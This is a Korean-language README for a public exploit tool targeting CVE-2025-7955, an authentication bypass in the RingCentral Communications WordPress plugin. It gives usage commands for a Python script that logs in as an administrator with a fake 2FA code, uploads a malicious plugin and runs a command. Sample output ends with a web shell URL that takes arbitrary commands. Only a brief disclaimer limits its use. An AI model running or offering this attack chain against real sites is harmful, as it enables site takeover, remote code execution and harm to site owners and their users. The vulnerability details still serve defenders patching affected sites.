
RingCentral Communications 1.5 - 1.6.8 - ringcentral_admin_login_2fa_verify 함수를 통한 인증 우회를 유발하는 서버 측 검증 누락
RingCentral Communications 1.5 - 1.6.8 - ringcentral_admin_login_2fa_verify 함수의 서버 측 검증 누락으로 인한 인증 우회
CVE: CVE-2025-7955
영향 받는 플러그인: RingCentral Communications (WordPress)
영향 받는 버전: 1.5 – 1.6.8
CVSS 점수: 9.8 (치명적)
유형: 인증 우회 (서버 측 검증 누락)
RingCentral Communications WordPress 플러그인은
ringcentral_admin_login_2fa_verify()함수 내 잘못된 검증으로 인해 인증 우회에 취약합니다. 1.5 ~ 1.6.8 버전에서는 인증되지 않은 공격자가 동일한 가짜 코드를 제공하기만 하면 임의의 사용자로 로그인할 수 있습니다.
이 익스플로잇은 CVE-2025-7955에 대한 전체 공격 체인을 자동화합니다. 다음을 위해 설계되었습니다:
/wp-json/wp/v2/users/ID)를 통해 이를 열거하려고 시도합니다.whoami를 실행하여 코드 실행을 시연하고 출력을 출력합니다.악성 플러그인 준비
스크립트와 같은 디렉터리에 악성 플러그인 ZIP 파일(기본값: Nxploit.zip)이 있는지 확인하세요.
익스플로잇 실행:
python3 CVE-2025-7955.py -u http://target/wordpress [-user admin] [-id 1] [-z Nxploit.zip]
-u, --url : (필수) 대상 WordPress 사이트 URL-user, --username : (선택) 로그인할 사용자 이름 (생략 시 자동 발견됨)-id, --id_admin : (기본값: 1) 사용자 ID (admin은 보통 ID 1)-z, --zip : (기본값: Nxploit.zip) 악성 플러그인 ZIP 경로예시:
python3 CVE-2025-7955.py -u http://target/wordpress
또는 사용자 이름/ID 지정:
888b 888 888 d8b 888 888
8888b 888 888 Y8P 888 888
88888b 888 888 888 888
888Y88b 888 888 888 88888b. 888 .d88b. 888 888888 .d88b. .d88888
888 Y88b888 `Y8bd8P' 888 "88b 888 d88""88b 888 888 d8P Y8b d88" 888
888 Y88888 X88K 888 888 888 888 888 888 888 88888888 888 888
888 Y8888 .d8""8b. 888 d88P 888 Y88..88P 888 Y88b. Y8b. Y88b 888
888 Y888 888 888 88888P" 888 "Y88P" 888 "Y888 "Y8888 "Y88888
888
888
888
CVE-2025-7955 Exploit By : Nxploited
[*] Using User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
[*] Attempting login as: admin (ID: 1)
[+] Login successful!
[+] Nonce: 661e57f2e4
[*] Uploading malicious plugin...
[+] Plugin uploaded successfully!
[*] Executing: whoami
----------------------------------------
daemon
----------------------------------------
[+] Shell: http://target/wordpress/wp-content/plugins/Nxploit/index.php?cmd=COMMAND
이 도구는 승인된 보안 테스트 및 교육 목적으로만 사용됩니다.
소유하지 않았거나 테스트에 대한 명시적 허가를 받지 않은 시스템에 대한 무단 사용은 불법이며 비윤리적입니다.
저자는 이 스크립트로 인한 오용 또는 손해에 대해 책임을 지지 않습니다.
제작: Khaled Alenazi (Nxploited)
python3 CVE-2025-7955.py -u http://target/wordpress -user admin -id 1